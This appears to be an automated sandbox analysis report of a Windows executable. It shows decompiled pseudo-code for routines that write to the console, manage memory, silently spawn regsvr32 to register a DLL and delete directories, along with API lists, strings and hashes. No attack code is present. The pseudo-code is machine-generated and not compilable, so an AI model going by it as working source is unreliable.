                                                            • Opcode Fuzzy Hash: f7e7be658f0a955c462c647893507e18f8cdc3df8b481e5329b6105bcbfa9dbc
                                                            • Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00624BA8, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E00624BA8(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v13;
				char _v84;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				void* _t58;
				void* _t91;
				char _t92;
				intOrPtr _t110;
				void* _t120;
				void* _t123;

				_t118 = __edi;
				_v116 = 0;
				_v120 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v8 = 0;
				_v12 = 0;
				_t120 = __ecx;
				_t91 = __edx;
				_v13 = __eax;
				_push(_t123);
				_push(0x624d3e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t123 + 0xffffff84;
				E005C745C( &_v8);
				_push(0x624d58);
				E005C4EA4(_v8,  &_v104);
				_push(_v104);
				_push(L"regsvr32.exe\"");
				E0040B550( &_v12, _t91, 3, __edi, _t120);
				if(_v13 != 0) {
					E0040B470( &_v12, 0x624d90);
				}
				_push(_v12);
				_push(L" /s \"");
				_push(_t120);
				_push(0x624d58);
				E0040B550( &_v12, _t91, 4, _t118, _t120);
				_t126 = _t91;
				if(_t91 == 0) {
					E0040B4C8( &_v112, _v12, L"Spawning 32-bit RegSvr32: ");
					E00616130(_v112, _t91, _t118, _t120);
				} else {
					E0040B4C8( &_v108, _v12, L"Spawning 64-bit RegSvr32: ");
					E00616130(_v108, _t91, _t118, _t120);
				}
				E00407760( &_v84, 0x44);
				_v84 = 0x44;
				_t58 = E0040B278(_v8);
				if(E0060C038(_t91, E0040B278(_v12), 0, _t126,  &_v100,  &_v84, _t58, 0, 0x4000000, 0, 0, 0) == 0) {
					E0060CE84(L"CreateProcess");
				}
				CloseHandle(_v96);
				_t92 = E00624AA4( &_v100);
				if(_t92 != 0) {
					_v128 = _t92;
					_v124 = 0;
					E004244F8(L"0x%x", 0,  &_v128,  &_v120);
					E005CD508(0x53,  &_v116, _v120);
					E00429008(_v116, 1);
					E004098C4();
				}
				_pop(_t110);
				 *[fs:eax] = _t110;
				_push(E00624D45);
				E0040A228( &_v120, 5);
				return E0040A228( &_v12, 2);
			}






















                                                            0x00624ba8
                                                            0x00624bb2
                                                            0x00624bb5
                                                            0x00624bb8
                                                            0x00624bbb
                                                            0x00624bbe
                                                            0x00624bc1
                                                            0x00624bc4
                                                            0x00624bc7
                                                            0x00624bc9
                                                            0x00624bcb
                                                            0x00624bd0
                                                            0x00624bd1
                                                            0x00624bd6
                                                            0x00624bd9
                                                            0x00624bdf
                                                            0x00624be4
                                                            0x00624bef
                                                            0x00624bf4
                                                            0x00624bf7
                                                            0x00624c04
                                                            0x00624c0d
                                                            0x00624c17
                                                            0x00624c17
                                                            0x00624c1c
                                                            0x00624c1f
                                                            0x00624c24
                                                            0x00624c25
                                                            0x00624c32
                                                            0x00624c37
                                                            0x00624c39
                                                            0x00624c60
                                                            0x00624c68
                                                            0x00624c3b
                                                            0x00624c46
                                                            0x00624c4e
                                                            0x00624c4e
                                                            0x00624c77
                                                            0x00624c7c
                                                            0x00624c93
                                                            0x00624cb6
                                                            0x00624cbd
                                                            0x00624cbd
                                                            0x00624cc6
                                                            0x00624cd3
                                                            0x00624cd7
                                                            0x00624cdd
                                                            0x00624ce0
                                                            0x00624cee
                                                            0x00624cfd
                                                            0x00624d0c
                                                            0x00624d11
                                                            0x00624d11
                                                            0x00624d18
                                                            0x00624d1b
                                                            0x00624d1e
                                                            0x00624d2b
                                                            0x00624d3d

                                                            APIs
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseDirectoryHandleSystem
                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                            • API String ID: 2051275411-1862435767
                                                            • Opcode ID: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                            • Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
                                                            • Opcode Fuzzy Hash: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                            • Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004062CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E004062CC(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x6cf05c == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L0040529C();
				} else {
					_t7 = E0040A6C4(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x6c507c; // 0x40543c
					_t12 = E0040A6C4(_t11);
					_t13 =  *0x6c507c; // 0x40543c
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E0040A6C4(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                            0x004062cc
                                                            0x004062cf
                                                            0x004062d1
                                                            0x004062da
                                                            0x0040633d
                                                            0x00406342
                                                            0x00406343
                                                            0x00406344
                                                            0x00406346
                                                            0x004062dc
                                                            0x004062e5
                                                            0x004062f4
                                                            0x00406300
                                                            0x00406305
                                                            0x0040630b
                                                            0x00406319
                                                            0x00406327
                                                            0x00406336
                                                            0x00406336
                                                            0x0040634e

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
                                                            • GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
                                                            • WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: <T@
                                                            • API String ID: 3320372497-2050694182
                                                            • Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                            • Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
                                                            • Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                            • Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405D88, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E00405D88(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x6cf05d; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00405764();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								if(VirtualFree(_t103, 0, 0x8000) == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x6d1b7c = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x6cf98d;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x6cf05d; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x6cfaec], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x6cf98d;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x6cfaec], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E004055DC(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E004055DC(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x6cfaf4 - 0x13ffe0;
							if( *0x6cfaf4 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E0040567C(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x6cfaf4 = 0x13ffe0;
								 *0x6cfaf0 = _t82;
								 *0x6cfaec = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x6cfaec = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E0040561C(_t106, _t88, _t81);
							 *0x6cfaec = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}




























                                                            0x00405d88
                                                            0x00405d88
                                                            0x00405d91
                                                            0x00405d97
                                                            0x00405e80
                                                            0x00405e83
                                                            0x00405f70
                                                            0x00405f71
                                                            0x00405f74
                                                            0x00405814
                                                            0x00405816
                                                            0x00405818
                                                            0x0040581d
                                                            0x00405820
                                                            0x00405825
                                                            0x00405829
                                                            0x0040582f
                                                            0x00405833
                                                            0x00405839
                                                            0x00405855
                                                            0x00405859
                                                            0x0040585c
                                                            0x0040585c
                                                            0x0040585e
                                                            0x00405866
                                                            0x00405873
                                                            0x00405878
                                                            0x0040587a
                                                            0x0040587c
                                                            0x0040587f
                                                            0x0040587f
                                                            0x00405881
                                                            0x00405885
                                                            0x00405887
                                                            0x00405889
                                                            0x0040588b
                                                            0x00000000
                                                            0x0040588b
                                                            0x00000000
                                                            0x00405887
                                                            0x0040583b
                                                            0x0040584a
                                                            0x00405850
                                                            0x0040584c
                                                            0x0040584c
                                                            0x0040584c
                                                            0x0040584a
                                                            0x0040588f
                                                            0x00405891
                                                            0x0040589a
                                                            0x004058a3
                                                            0x004058a3
                                                            0x004058a6
                                                            0x004058b6
                                                            0x00405f7a
                                                            0x00405f7f
                                                            0x00405f7f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405d9d
                                                            0x00405d9d
                                                            0x00405d9f
                                                            0x00405da1
                                                            0x00405e04
                                                            0x00405e04
                                                            0x00405e09
                                                            0x00405e0d
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e0f
                                                            0x00405e11
                                                            0x00405e18
                                                            0x00000000
                                                            0x00405e1a
                                                            0x00405e1e
                                                            0x00405e23
                                                            0x00405e24
                                                            0x00405e25
                                                            0x00405e2a
                                                            0x00405e2e
                                                            0x00405e38
                                                            0x00405e3d
                                                            0x00405e3e
                                                            0x00000000
                                                            0x00405e3e
                                                            0x00405e2e
                                                            0x00000000
                                                            0x00405e18
                                                            0x00405e04
                                                            0x00405da3
                                                            0x00405da3
                                                            0x00405da3
                                                            0x00405da3
                                                            0x00405da7
                                                            0x00405daa
                                                            0x00405dd8
                                                            0x00405dda
                                                            0x00405def
                                                            0x00405def
                                                            0x00405ddc
                                                            0x00405ddc
                                                            0x00405ddf
                                                            0x00405de2
                                                            0x00405de5
                                                            0x00405de8
                                                            0x00405dea
                                                            0x00405ded
                                                            0x00000000
                                                            0x00000000
                                                            0x00405ded
                                                            0x00405df2
                                                            0x00405df4
                                                            0x00405df6
                                                            0x00405df9
                                                            0x00405e89
                                                            0x00405e8c
                                                            0x00405e8e
                                                            0x00405e90
                                                            0x00405e91
                                                            0x00405e93
                                                            0x00405e44
                                                            0x00405e44
                                                            0x00405e49
                                                            0x00405e51
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e53
                                                            0x00405e55
                                                            0x00405e5c
                                                            0x00000000
                                                            0x00405e5e
                                                            0x00405e60
                                                            0x00405e65
                                                            0x00405e6a
                                                            0x00405e72
                                                            0x00405e76
                                                            0x00000000
                                                            0x00405e76
                                                            0x00405e72
                                                            0x00000000
                                                            0x00405e5c
                                                            0x00405e44
                                                            0x00405e95
                                                            0x00405e95
                                                            0x00405e9d
                                                            0x00405ea1
                                                            0x00405ed8
                                                            0x00405edb
                                                            0x00405ede
                                                            0x00405ee0
                                                            0x00405ee6
                                                            0x00405ee8
                                                            0x00405ee8
                                                            0x00405ea3
                                                            0x00405ea3
                                                            0x00405ea3
                                                            0x00405ea6
                                                            0x00405ea6
                                                            0x00405eaa
                                                            0x00405eae
                                                            0x00405ef0
                                                            0x00405ef3
                                                            0x00405ef5
                                                            0x00405ef7
                                                            0x00405efd
                                                            0x00405f01
                                                            0x00405f01
                                                            0x00405efd
                                                            0x00405eb0
                                                            0x00405eb6
                                                            0x00405f08
                                                            0x00405f12
                                                            0x00405f40
                                                            0x00405f46
                                                            0x00405f4b
                                                            0x00405f52
                                                            0x00405f5c
                                                            0x00405f62
                                                            0x00405f69
                                                            0x00405f6d
                                                            0x00405f14
                                                            0x00405f14
                                                            0x00405f17
                                                            0x00405f19
                                                            0x00405f1c
                                                            0x00405f1f
                                                            0x00405f21
                                                            0x00405f30
                                                            0x00405f35
                                                            0x00405f38
                                                            0x00405f3c
                                                            0x00405f3c
                                                            0x00405eb8
                                                            0x00405ebb
                                                            0x00405ebe
                                                            0x00405ec6
                                                            0x00405ecb
                                                            0x00405ed2
                                                            0x00405ed6
                                                            0x00405ed6
                                                            0x00405dac
                                                            0x00405dac
                                                            0x00405dae
                                                            0x00405db4
                                                            0x00405db7
                                                            0x00405dc0
                                                            0x00405dc3
                                                            0x00405dc6
                                                            0x00405dc9
                                                            0x00405dcc
                                                            0x00405dcf
                                                            0x00405dd2
                                                            0x00405dd2
                                                            0x00405dd4
                                                            0x00405dd5
                                                            0x00405db9
                                                            0x00405db9
                                                            0x00405db9
                                                            0x00405dbb
                                                            0x00405dbd
                                                            0x00405dbe
                                                            0x00405dbe
                                                            0x00405db7
                                                            0x00405daa

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                            • Instruction ID: 71ad01a6e0dc675f4130d8d0918bf11407b14d9ec69c5e02b41b8aae26145368
                                                            • Opcode Fuzzy Hash: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                            • Instruction Fuzzy Hash: 2871C031604A008FD715DB69C989B27BBD5EF85314F18C17FE888AB3D2D6B88941CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00628E3C, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E00628E3C(void* __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				char _v24;
				void* _t44;
				intOrPtr _t50;
				void* _t51;
				void* _t65;
				void* _t71;
				void* _t76;
				intOrPtr _t88;
				signed int _t103;
				void* _t104;
				char _t106;
				void* _t109;
				void* _t122;

				_t122 = __fp0;
				_push(__ebx);
				_push(__esi);
				_v24 = 0;
				_v8 = __ecx;
				_t106 = __edx;
				_t76 = __eax;
				_push(_t109);
				_push(0x628fc2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t109 + 0xffffffec;
				_t103 = E0060C330(__eax, __edx, __eflags);
				if(_t103 == 0xffffffff || (_t103 & 0x00000010) == 0) {
					_v9 = 1;
					goto L18;
				} else {
					_v20 = _t106;
					_v16 = 0x11;
					E006163B4(L"Deleting directory: %s", _t76, 0,  &_v20, _t103, _t106);
					if((_t103 & 0x00000001) == 0) {
						L9:
						_t44 = E0060C664(_t76, _t106, _t117);
						asm("sbb eax, eax");
						_v9 = _t44 + 1;
						if(_v9 != 0) {
							L18:
							_pop(_t88);
							 *[fs:eax] = _t88;
							_push(E00628FC9);
							return E0040A1C8( &_v24);
						}
						_t104 = GetLastError();
						if(_v8 == 0) {
							__eflags = _a4;
							if(_a4 == 0) {
								L16:
								_v20 = _t104;
								_v16 = 0;
								E006163B4(L"Failed to delete directory (%d).", _t76, 0,  &_v20, _t104, _t106);
								goto L18;
							}
							_t50 = E00628C68(_a4, _t76, _t106, _t106);
							__eflags = _t50;
							if(_t50 == 0) {
								goto L16;
							}
							_t51 = E00429D18();
							__eflags = _t51 - 2;
							if(_t51 != 2) {
								goto L16;
							}
							_v20 = _t104;
							_v16 = 0;
							E006163B4(L"Failed to delete directory (%d). Will delete on restart (if empty).", _t76, 0,  &_v20, _t104, _t106);
							E00628D50(_t76, _t76, _t106, _t104, _t106);
							goto L18;
						}
						_v20 = _t104;
						_v16 = 0;
						E006163B4(L"Failed to delete directory (%d). Will retry later.", _t76, 0,  &_v20, _t104, _t106);
						E0040B29C();
						E0040B470( &_v24, _t106);
						E00610640(_v8, 0, _v24, _t122);
						goto L18;
					}
					_t115 = _t103 & 0x00000400;
					if((_t103 & 0x00000400) != 0) {
						L5:
						_t65 = E0060C6DC(_t76, 0xfffffffe & _t103, _t106, _t116);
						_t117 = _t65;
						if(_t65 == 0) {
							E00616130(L"Failed to strip read-only attribute.", _t76, _t103, _t106);
						} else {
							E00616130(L"Stripped read-only attribute.", _t76, _t103, _t106);
						}
						goto L9;
					}
					_t71 = E0060DFAC(_t76, _t76, _t106, _t106, _t115);
					_t116 = _t71;
					if(_t71 == 0) {
						E00616130(L"Not stripping read-only attribute because the directory does not appear to be empty.", _t76, _t103, _t106);
						goto L9;
					}
					goto L5;
				}
			}




















                                                            0x00628e3c
                                                            0x00628e42
                                                            0x00628e43
                                                            0x00628e47
                                                            0x00628e4a
                                                            0x00628e4d
                                                            0x00628e4f
                                                            0x00628e53
                                                            0x00628e54
                                                            0x00628e59
                                                            0x00628e5c
                                                            0x00628e68
                                                            0x00628e6d
                                                            0x00628fa8
                                                            0x00000000
                                                            0x00628e7f
                                                            0x00628e7f
                                                            0x00628e82
                                                            0x00628e90
                                                            0x00628e9b
                                                            0x00628ee8
                                                            0x00628eec
                                                            0x00628ef4
                                                            0x00628ef7
                                                            0x00628efe
                                                            0x00628fac
                                                            0x00628fae
                                                            0x00628fb1
                                                            0x00628fb4
                                                            0x00628fc1
                                                            0x00628fc1
                                                            0x00628f09
                                                            0x00628f0f
                                                            0x00628f51
                                                            0x00628f55
                                                            0x00628f90
                                                            0x00628f90
                                                            0x00628f93
                                                            0x00628fa1
                                                            0x00000000
                                                            0x00628fa1
                                                            0x00628f5c
                                                            0x00628f61
                                                            0x00628f63
                                                            0x00000000
                                                            0x00000000
                                                            0x00628f65
                                                            0x00628f6a
                                                            0x00628f6d
                                                            0x00000000
                                                            0x00000000
                                                            0x00628f6f
                                                            0x00628f72
                                                            0x00628f80
                                                            0x00628f89
                                                            0x00000000
                                                            0x00628f89
                                                            0x00628f11
                                                            0x00628f14
                                                            0x00628f22
                                                            0x00628f35
                                                            0x00628f3f
                                                            0x00628f4a
                                                            0x00000000
                                                            0x00628f4a
                                                            0x00628e9d
                                                            0x00628ea3
                                                            0x00628eb2
                                                            0x00628ebd
                                                            0x00628ec2
                                                            0x00628ec4
                                                            0x00628ed7
                                                            0x00628ec6
                                                            0x00628ecb
                                                            0x00628ecb
                                                            0x00000000
                                                            0x00628ec4
                                                            0x00628ea9
                                                            0x00628eae
                                                            0x00628eb0
                                                            0x00628ee3
                                                            0x00000000
                                                            0x00628ee3
                                                            0x00000000
                                                            0x00628eb0

                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00628FC2,?,00000000,?), ref: 00628F04
                                                              • Part of subcall function 0060DFAC: FindClose.KERNEL32(000000FF,0060E0A1), ref: 0060E090
                                                            Strings
                                                            • Failed to strip read-only attribute., xrefs: 00628ED2
                                                            • Deleting directory: %s, xrefs: 00628E8B
                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00628F7B
                                                            • Failed to delete directory (%d)., xrefs: 00628F9C
                                                            • Stripped read-only attribute., xrefs: 00628EC6
                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00628EDE
                                                            • Failed to delete directory (%d). Will retry later., xrefs: 00628F1D
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
